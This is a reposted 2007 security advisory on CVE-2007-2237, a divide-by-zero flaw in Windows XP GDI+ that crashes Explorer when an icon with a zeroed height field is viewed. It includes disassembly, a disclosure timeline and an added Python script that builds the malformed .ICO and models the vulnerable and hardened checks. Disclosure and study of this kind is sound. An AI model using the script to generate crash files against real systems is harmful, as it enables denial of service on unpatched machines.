Credit:
The information has been provided by Dennis Rand.
The original article can be found at: http://www.csis.dk/dk/forside/GdiPlus.pdf
Vulnerable Systems:
* Windows XP Service Pack 2

CSIS Security Group has discovered an integer division by zero flaw in the GDI+ component of Windows XP. The condition is triggered when a malformed ICO file is viewed through Windows Explorer or another component that renders icons through GDI+, such as Windows Picture and Fax Viewer.
The consequence of this flaw is a Denial of Service condition against any application using the vulnerable GDI+ component; when the viewing application is Windows Explorer, the explorer process crashes and is restarted. The trigger is the InfoHeader -> Height value of the malformed .ICO file: writing 0x00000000 at byte locations 31 to 34 (counting from 1; in a single-image icon this is the biHeight field of the BITMAPINFOHEADER, which follows the 6-byte ICONDIR and the 16-byte ICONDIRENTRY) produces the crash.
Disassembly of the code:
Execution reaches the code below and raises an integer division by zero exception at 4ED9E28F, which crashes and restarts the explorer process.
Below is the vulnerable function:
.text:4ED9E209 ; private: int __thiscall GpIcoCodec::IsValidDIB(unsigned int)
.text:4ED9E209 ?IsValidDIB@GpIcoCodec@@AAEHI@Z proc near
.text:4ED9E209 ; CODE XREF: GpIcoCodec::ReadHeaders(void)+188p
Integer division by zero:
4ED9E28A mov eax,7FFFF000h ; 7FFFF000h = 2147479552
4ED9E28F div eax,edi ; edx:eax / edi = 2147479552 / 0 (edi holds the Height value read from the file, here 0) -> #DE, no check for a zero divisor
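The file layout and the unchecked division described above, as an added example that is not part of the original advisory or of GDI+ itself. The script constructs a minimal well-formed single-image .ico in memory, applies the advisory's mutation (zeroing file bytes 31 to 34, i.e. biHeight), parses the headers back, and runs two models of IsValidDIB: one that divides 7FFFF000h by the Height field with no zero test, as the disassembly shows, and a hardened one that rejects a zero or negative height first. What GDI+ actually does with the quotient is not stated in the advisory; comparing it against biWidth is an assumption made here so the guard has something to protect. Python's ZeroDivisionError stands in for the CPU's #DE exception.

```python
import struct

# Layout of a single-image .ico (all fields little-endian):
#   ICONDIR           6 bytes  idReserved, idType (=1 for icons), idCount
#   ICONDIRENTRY     16 bytes  bWidth, bHeight, bColorCount, bReserved,
#                              wPlanes, wBitCount, dwBytesInRes, dwImageOffset
#   BITMAPINFOHEADER 40 bytes  biSize, biWidth, biHeight, ...
# biHeight therefore starts at file offset 6 + 16 + 8 = 30, which is the
# advisory's "byte location 31 to 34" when bytes are counted from 1.
ICONDIR = struct.Struct("<HHH")
ICONDIRENTRY = struct.Struct("<BBBBHHII")
BITMAPINFOHEADER = struct.Struct("<IiiHHIIiiII")
HEIGHT_OFFSET = ICONDIR.size + ICONDIRENTRY.size + 8  # 30


def build_ico(width=1, height=1):
    """Constructed sample: a well-formed 32-bpp icon with one image."""
    bpp = 32
    xor_row = ((width * bpp + 31) // 32) * 4        # rows are DWORD-aligned
    and_row = ((width + 31) // 32) * 4
    xor_mask = (b"\x00\x00\xff\x00" * width).ljust(xor_row, b"\x00") * height
    and_mask = bytes(and_row * height)
    # In an ICO the DIB header's biHeight covers both masks, so it is 2 * height.
    dib = BITMAPINFOHEADER.pack(40, width, 2 * height, 1, bpp, 0,
                                len(xor_mask) + len(and_mask), 0, 0, 0, 0)
    entry = ICONDIRENTRY.pack(width, height, 0, 0, 1, bpp,
                              len(dib) + len(xor_mask) + len(and_mask),
                              ICONDIR.size + ICONDIRENTRY.size)
    return ICONDIR.pack(0, 1, 1) + entry + dib + xor_mask + and_mask


def zero_height(ico):
    """Reproduce the advisory's mutation: overwrite biHeight with 0x00000000."""
    return ico[:HEIGHT_OFFSET] + b"\x00" * 4 + ico[HEIGHT_OFFSET + 4:]


def read_dib_header(ico):
    """Return (biWidth, biHeight) of the first image, following dwImageOffset."""
    _, id_type, count = ICONDIR.unpack_from(ico, 0)
    if id_type != 1 or count < 1:
        raise ValueError("not an ICO file")
    entry = ICONDIRENTRY.unpack_from(ico, ICONDIR.size)
    fields = BITMAPINFOHEADER.unpack_from(ico, entry[7])
    if fields[0] != 40:
        raise ValueError("unexpected biSize %d" % fields[0])
    return fields[1], fields[2]


def is_valid_dib_unchecked(width, height):
    """Model of the vulnerable path: 7FFFF000h / edi with no test on edi.
    The comparison against width is an assumption; the advisory only shows
    the division. Python raises ZeroDivisionError where the CPU raises #DE."""
    return width <= 0x7FFFF000 // height


def is_valid_dib(width, height):
    """Hardened variant: reject a zero or negative height before dividing."""
    if width <= 0 or height <= 0:
        return False
    return width <= 0x7FFFF000 // height


def check_file(ico, checker):
    """Parse the DIB header and run a validity check; report a #DE as 'crash'."""
    width, height = read_dib_header(ico)
    try:
        return "valid" if checker(width, height) else "rejected"
    except ZeroDivisionError:
        return "crash"


if __name__ == "__main__":
    good = build_ico()
    bad = zero_height(good)
    for name, ico in (("well-formed", good), ("zero height", bad)):
        print(name, read_dib_header(ico),
              "unchecked:", check_file(ico, is_valid_dib_unchecked),
              "hardened:", check_file(ico, is_valid_dib))
```

Writing `zero_height(build_ico())` to disk gives a file with the same mutation the advisory describes; the point of the hardened check is that any field used as a divisor must be range-checked before the division, since a #DE in a DLL loaded by explorer.exe takes the whole process down.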
Analysis:
Exploitation of the flaw results, at minimum, in a Denial of Service condition against the program using the GDI+ component, and a restart of the explorer process when that program is Windows Explorer. A divide-by-zero exception by itself gives the attacker no control over memory contents or the instruction pointer, and further code execution has not been verified.
Timeline of public disclosure
02-04-2007 Vulnerability discovered.
17-04-2007 Research ended.
18-04-2007 CERT/CC informed
18-04-2007 Received VU#290961 from CERT/CC
25-04-2007 Received CVE-2007-2237 from CERT/CC
03-05-2007 Reported to Microsoft MSRC (secure@microsoft.com)
03-05-2007 Received response from MSRC (Case: 7402)
31-05-2007 Received response from MSRC: flaw will be fixed in the next Service Pack
31-05-2007 Information released on CSIS Platinum mailing list
06-06-2007 Public release
CVE Information:
CVE-2007-2237